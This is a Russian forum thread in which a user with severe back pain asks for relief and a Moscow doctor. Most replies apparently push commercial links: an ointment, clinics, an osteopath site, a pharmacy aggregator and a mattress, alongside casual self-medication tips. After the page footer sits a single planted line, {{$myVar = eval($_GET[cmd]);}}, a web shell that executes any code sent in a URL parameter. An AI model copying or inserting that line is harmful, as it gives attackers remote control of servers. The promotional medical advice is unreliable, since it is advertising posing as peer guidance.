+ Ответить в теме
Страница 1 из 3 1 2 3 ПоследняяПоследняя
Показано с 1 по 10 из 22

Тема: Болит спина


  1. #1
    Мимо проходил Слон is on a distinguished road Аватар для Слон
    Регистрация
    14.01.2019
    Откуда
    .
    Машина
    .
    Сообщений
    28

    Болит спина

    У меня сильно болят суставы спины, всему виной сидячая работа. Сегодня боль прямо адская, пришлось с работы отпроситься. Подскажите, чем быстро снять боль? И к какому врачу мне обратиться? Я из Москвы.

  2. #2
    Мимо проходил Victan is on a distinguished road Аватар для Victan
    Регистрация
    12.01.2019
    Откуда
    ......
    Машина
    ....
    Сообщений
    39
    Согревающие мази пробовали? Мне, например, мазь Випратокс с ядом гюрзы хорошо помогает, эта мазь блокирует передачу нервных импульсов от источника боли.

  3. #3
    Мимо проходил Слон is on a distinguished road Аватар для Слон
    Регистрация
    14.01.2019
    Откуда
    .
    Машина
    .
    Сообщений
    28
    Мази использовал, конечно, но сегодня они мне не помогают. Я просто обездвижен. Випратокс я не пробовал, куплю обязательно. Спасибо.

  4. #4
    Мимо проходил Юбик is on a distinguished road Аватар для Юбик
    Регистрация
    22.01.2019
    Откуда
    Москва
    Сообщений
    31
    Противовоспалительными таблетками и рекламируемыми мазями можно только на время успокоить боль, но суставы от этого, к сожалению, не вылечиваются. Вам нужно пройти курс процедур, который усиливает регенерацию ткани. Но если боль прямо невыносимая, тогда вам поможет только блокада суставов, подробнее про эту процедуру и цену можете тут узнать http://stopartroz.ru/methods-of-trea...-blockade.html

  5. #5
    Мимо проходил Слон is on a distinguished road Аватар для Слон
    Регистрация
    14.01.2019
    Откуда
    .
    Машина
    .
    Сообщений
    28
    Спасибо за ответ, почитаю, а подскажите, как думаете, остеопат может помочь при таких симптомах? Может у кого-то есть контакты проверенного остеопата в Москве?

  6. #6
    Мимо проходил Пирон is on a distinguished road Аватар для Пирон
    Регистрация
    23.01.2019
    Откуда
    Москва
    Машина
    ...
    Сообщений
    23
    Цитата Сообщение от Слон Посмотреть сообщение
    Спасибо за ответ, почитаю, а подскажите, как думаете, остеопат может помочь при таких симптомах? Может у кого-то есть контакты проверенного остеопата в Москве?
    Думаю, да, ведь он своими руками может воздействовать на костно-мышечную систему, на суставы. Но сначала вам нужно избавиться от острой боли, наверное, пока вам массаж запрещен. Как только боль утихнет, так и сходите к остеопату. Может я, конечно, ошибаюсь, у меня нет мед. образования, лучше узнайте у этого врача сами, например, тут можно это сделать http://mososteopat.ru/

  7. #7
    Мимо проходил Gaspacho is on a distinguished road Аватар для Gaspacho
    Регистрация
    21.01.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    12
    В любой больнице в регистратуре скажите о проблеме и вас направят.

  8. #8
    Новичок Rusik23 is on a distinguished road Аватар для Rusik23
    Регистрация
    25.10.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    179
    Товарищ, еще не поздно взять себя в руки и начать делать зарядку! А еще лучше - скачать какую-нибудь олдовую брошюрки с китайской или тибетской гимнастикой и начать её фанатично делать. Лечебная физкультура сделает то, что не сделают никакие лекарства! Есть в Екатеринбурге компания http://stimul-ural.ru, которая на дому проводит ЛФК (лечебная физ-ра) для пациентов после травм и инсультов. Физкультура их главное и самое действенное средство.
    Вашей спине тоже поможет.

  9. #9
    Мимо проходил Medved is on a distinguished road Аватар для Medved
    Регистрация
    27.12.2018
    Откуда
    Россия
    Машина
    Гольф
    Сообщений
    42
    Цитата Сообщение от Слон Посмотреть сообщение
    У меня сильно болят суставы спины, всему виной сидячая работа. Сегодня боль прямо адская, пришлось с работы отпроситься. Подскажите, чем быстро снять боль?
    Я ибупрофен принимаю в таких случаях. Он быстро и воспаление и мышечные спазмы снимает. Продается без рецепта во всех аптека города, а стоит вообще копейки. да сами вон можете на Ютеке посмотреть: https://uteka.ru/lekarstvennye-sreds...tva/ibuprofen/ Это аптечный агрегатор, который показывает цены и наличие лекарств во всех аптеках города. Очень удобно

  10. #10
    Мимо проходил MarryMarry is on a distinguished road Аватар для MarryMarry
    Регистрация
    03.02.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    13
    Вам нужно чтобы ваша спина отдыхала хотя- бы во сне, поэтому напрашивается вопрос: на каком матрасе вы спите? Если обычный, тогда вам нужно менять его на правильный http://www.volgograd-trv.ru/news.aspx?id=47270, пружинный или без это вам решать, можете в Мебельок у менеджера посоветоваться ли отзывы в сети поискать.

+ Ответить в теме
Страница 1 из 3 1 2 3 ПоследняяПоследняя

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}